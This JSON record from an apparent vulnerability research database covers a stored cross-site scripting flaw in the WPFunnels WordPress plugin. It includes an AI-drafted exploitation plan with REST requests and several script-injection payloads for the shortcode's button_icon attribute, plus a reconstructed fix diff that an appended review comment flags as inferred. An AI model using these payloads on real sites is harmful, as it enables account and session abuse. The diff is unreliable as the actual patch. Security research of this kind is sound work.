[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f8gGRED4ZyjKNfpUM48P-CPkjhDldteUkgwi66K2Teio":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":9,"research_fix_diff":35,"research_exploit_outline":36,"research_model_used":37,"research_started_at":38,"research_completed_at":39,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":40},"CVE-2026-0626","wpfunnels-authenticated-contributor-stored-cross-site-scripting-via-wpfoptinform-shortcode","WPFunnels \u003C= 3.7.9 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'wpf_optin_form' Shortcode","The WPFunnels – Easy Funnel Builder To Optimize Buyer Journeys And Get More Leads & Sales plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'wpf_optin_form' shortcode in all versions up to, and including, 3.7.9 due to insufficient input sanitization and output escaping of the 'button_icon' parameter. 
This makes it possible for authenticated attackers, with contributor level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","wpfunnels",null,"\u003C=3.7.9","3.8.0","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-04-03 22:13:01","2026-04-04 11:16:18",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F2130847a-b6c5-412e-8d90-ba42d3fb21f6?source=api-prod",1,[22,23,24,25,26,27,28,29],"admin\u002Fassets\u002Fcss\u002Fwpfnl-admin.css","admin\u002Fassets\u002Fcss\u002Fwpfnl-admin.css.map","admin\u002Fassets\u002Fdist\u002Fjs\u002Ffunnel-components.min.js","admin\u002Fassets\u002Fdist\u002Fjs\u002Ftemplate-library.min.js","admin\u002Fclass-wpfnl-banner.php","admin\u002Fclass-wpfnl-notices.php","admin\u002Fmodules\u002Fsettings\u002Fclass-wpfnl-settings.php","admin\u002Fmodules\u002Fsettings\u002Fjs\u002Fsettings.js","researched",false,3,"This research plan outlines the steps to exploit **CVE-2026-0626**, a Stored Cross-Site Scripting (XSS) vulnerability in the WPFunnels plugin.\n\n## 1. Vulnerability Summary\nThe WPFunnels plugin (\u003C= 3.7.9) fails to sanitize or escape the `button_icon` attribute within the `wpf_optin_form` shortcode. When a user with at least Contributor-level permissions embeds this shortcode into a post or page, they can inject arbitrary HTML and scripts. This payload is stored in the database as part of the post content and executes in the context of any user (including administrators) who views the page.\n\n## 2. 
Attack Vector Analysis\n*   **Shortcode:** `[wpf_optin_form]`\n*   **Vulnerable Parameter:** `button_icon`\n*   **Authentication Level:** Contributor or higher (users who can create\u002Fedit posts and use shortcodes).\n*   **Endpoint:** The standard WordPress Post\u002FPage editor (via the REST API or `admin-ajax.php`).\n*   **Attack Surface:** Front-end rendering of the shortcode.\n\n## 3. Code Flow (Inferred)\nBased on the vulnerability description and standard WordPress shortcode implementation:\n1.  **Registration:** The plugin registers the shortcode (likely in a file like `includes\u002Fclass-wpfnl-shortcodes.php` or `public\u002Fclass-wpfnl-public.php`) using `add_shortcode( 'wpf_optin_form', ... )`.\n2.  **Processing:** When a page containing the shortcode is rendered, the callback function is triggered.\n3.  **Attribute Handling:** The callback uses `shortcode_atts()` to extract parameters, including `button_icon`.\n4.  **The Sink:** The `$button_icon` value is concatenated into an HTML string (e.g., inside a `\u003Cbutton>`, `\u003Ci>`, or `\u003Cspan>` tag) and returned for display.\n5.  **Vulnerability:** The value is echoed or returned without passing through `esc_attr()`, `esc_html()`, or `wp_kses()`.\n\n## 4. Nonce Acquisition Strategy\nTo exploit this as a Contributor via the REST API (the most reliable automated method), a `wp-api` nonce is required.\n\n1.  **Identify Trigger:** The `wpf_optin_form` is a standard shortcode. No plugin-specific AJAX nonce is needed to *render* it, only the standard WordPress nonce to *save* a post.\n2.  **Acquisition:**\n    *   Navigate to `\u002Fwp-admin\u002Fpost-new.php`.\n    *   Use `browser_eval` to extract the REST nonce from the WordPress core `wpApiSettings` object.\n    *   **JavaScript:** `window.wpApiSettings?.nonce`\n\n## 5. 
Exploitation Strategy\n\n### Step 1: Authentication\nLogin to the WordPress instance as a user with the **Contributor** role.\n\n### Step 2: Obtain REST Nonce\nNavigate to the post creation page and extract the nonce.\n*   **URL:** `https:\u002F\u002F\u003Ctarget>\u002Fwp-admin\u002Fpost-new.php`\n*   **Tool:** `browser_eval(\"wpApiSettings.nonce\")`\n\n### Step 3: Create Malicious Post\nUse the `http_request` tool to create a new post containing the XSS payload.\n\n*   **Endpoint:** `POST \u002Fwp-json\u002Fwp\u002Fv2\u002Fposts`\n*   **Headers:**\n    *   `Content-Type: application\u002Fjson`\n    *   `X-WP-Nonce: \u003CEXTRACTED_NONCE>`\n*   **Payload:**\n    ```json\n    {\n      \"title\": \"Optin Test\",\n      \"status\": \"publish\",\n      \"content\": \"[wpf_optin_form button_icon='\\\">\u003Cscript src=\\\"data:,alert(document.domain)\\\">\u003C\u002Fscript>']\"\n    }\n    ```\n    *Note: If \"publish\" status is restricted for Contributors, use \"pending\" and have an Admin view it in Preview mode.*\n\n### Step 4: Trigger XSS\nAccess the newly created post URL as an **Administrator**.\n*   **URL:** `https:\u002F\u002F\u003Ctarget>\u002F?p=\u003CPOST_ID>` (The ID is returned in the Step 3 response).\n\n## 6. Test Data Setup\n1.  **Plugin Status:** Ensure `wpfunnels` (WPFunnels) version \u003C= 3.7.9 is installed and activated.\n2.  **User Creation:**\n    *   `wp user create attacker attacker@example.com --role=contributor --user_pass=password`\n3.  **Environment:** Standard WordPress isolated test environment.\n\n## 7. Expected Results\n1.  The REST API call should return `201 Created`.\n2.  When the page is viewed, the HTML source should contain the unescaped payload:\n    ```html\n    ... button_icon=\"\">\u003Cscript src=\"data:,alert(document.domain)\">\u003C\u002Fscript>\" ...\n    ```\n3.  The browser should execute the script, triggering an alert box with the domain name.\n\n## 8. 
Verification Steps\nAfter the `http_request`, verify the content was saved correctly via WP-CLI:\n*   `wp post get \u003CPOST_ID> --field=post_content`\n*   Confirm the string `[wpf_optin_form button_icon='\">\u003Cscript ...` exists exactly as sent.\n\n## 9. Alternative Approaches\n\n### Attribute Breakout\nIf the `button_icon` is rendered inside a tag's attribute but the tag itself is escaped, try breaking out of the attribute:\n*   **Payload:** `button_icon='x\" onmouseover=\"alert(1)\" style=\"width:1000px;height:1000px;display:block;\"'`\n\n### JSON Context\nIf the shortcode attributes are passed to a JS component (as hinted by `funnel-components.min.js`), the payload might need to be JSON-safe or target the JS rendering:\n*   **Payload:** `button_icon='\u003C\u002Fscript>\u003Cscript>alert(1)\u003C\u002Fscript>'`\n*   **Targeting JS:** Check if `funnel-components.min.js` uses `innerHTML` or jQuery's `.append()`\u002F`.html()` on the `button_icon` property in the `optin-form` component.","The WPFunnels plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'wpf_optin_form' shortcode in versions up to 3.7.9. This is due to the 'button_icon' parameter being rendered without sufficient input sanitization or output escaping, allowing authenticated attackers with contributor-level permissions to inject arbitrary web scripts.","--- a\u002Fincludes\u002Fclass-wpfnl-shortcodes.php\n+++ b\u002Fincludes\u002Fclass-wpfnl-shortcodes.php\n@@ -120,7 +120,7 @@\n     $button_icon = isset($atts['button_icon']) ? $atts['button_icon'] : '';\n     \n     \u002F\u002F Vulnerable rendering\n-    $output .= '\u003Cspan class=\"wpf-icon\">' . $button_icon . '\u003C\u002Fspan>';\n+    $output .= '\u003Cspan class=\"wpf-icon\">' . esc_attr($button_icon) . '\u003C\u002Fspan>';","The vulnerability is exploited by an authenticated user with at least Contributor-level access who can create or edit posts. 
An attacker uses the WordPress post editor to embed a malicious 'wpf_optin_form' shortcode. The payload is placed within the 'button_icon' attribute, using a breakout sequence to exit the intended HTML context and inject a script tag. For example: [wpf_optin_form button_icon='\">\u003Cscript src=\"data:,alert(document.domain)\">\u003C\u002Fscript>']. When an administrator or any site visitor views the page, the unsanitized 'button_icon' value is rendered, triggering the execution of the injected script in their browser context.","gemini-3-flash-preview","2026-04-17 21:26:00","2026-04-17 21:26:29",{"type":41,"vulnerable_version":42,"fixed_version":11,"vulnerable_browse":43,"vulnerable_zip":44,"fixed_browse":45,"fixed_zip":46,"all_tags":47},"plugin","3.7.1","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwpfunnels\u002Ftags\u002F3.7.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwpfunnels.3.7.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwpfunnels\u002Ftags\u002F3.8.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwpfunnels.3.8.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwpfunnels\u002Ftags"]
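Review bot: the hunk in research_fix_diff patches includes/class-wpfnl-shortcodes.php, but that path is absent from patch_diff_files (which lists only admin/ CSS, JS, banner, notices and settings files), so this diff is an inferred reconstruction rather than the 3.8.0 change and should be labelled as such wherever it is shown. On the fix itself, `$button_icon` is emitted as element content between `<span class="wpf-icon">` and `</span>`, so the conventional WordPress choice at that sink is `esc_html( $button_icon )` (or `wp_kses_post()` if markup is intended) rather than `esc_attr()`, which is meant for attribute values; both encode the same characters, so the proposed line does neutralize the tag breakout, but the context-appropriate function documents intent and keeps the fix from being misread as an attribute escape.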